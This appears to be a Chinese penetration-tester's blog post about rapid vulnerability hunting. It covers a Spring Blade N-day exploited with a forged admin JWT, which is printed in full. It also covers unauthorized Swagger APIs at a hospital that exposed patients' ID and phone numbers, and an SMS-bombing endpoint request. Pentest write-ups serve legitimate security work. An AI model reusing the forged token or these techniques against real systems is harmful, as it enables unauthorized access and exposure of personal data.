安服仔漏洞挖掘

在项目中一般时间很紧，给挖掘漏洞的时间也就一天，还必须有漏洞产出，本次来讲述一下 如何快速挖掘漏洞，本次过程相关截图均已进行脱敏处理。

主要用到的工具

• afrog

• FindSomething

• yakit

• dirsearch

• fuff

指纹识别使用Nday漏洞利用

通过afrog工具识别到了项目中有一个资产使用了Spring Blade框架，并快速使用Nday完成漏洞利用

构造jwt

使用构造的jwt加密

Blade-Auth: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ

获取数据库账户密码

获取管理员账户密码

解密管理员md5 登录后台

某医院漏洞挖掘

在一次医院渗透时，其微信公众号有功能，抓包将域名提取出来进行测试

医院挖掘漏洞大部分可按照这个方向来挖掘

1、接口未授权访问  

2、sql注入漏洞  

3、Swagger接口未授权

未授权漏洞

Swagger接口未授权

在对Swagger泄露的接口进行未授权批量测试，推荐使用yakit工具

查询到一堆医院用户的个人信息，身份证，电话号码等

使用yakit fuzz模糊测试

发现prod-api/resource/sms/code接口提示报错 phoneNumber

将参数拼接，经过测试可以无限次发送请求，造成短信轰炸

/prod-api/resource/sms/code?phoneNumber=1888888888 HTTP/1.1

原文始发于微信公众号（安全逐梦人）：记一次项目中快速挖掘漏洞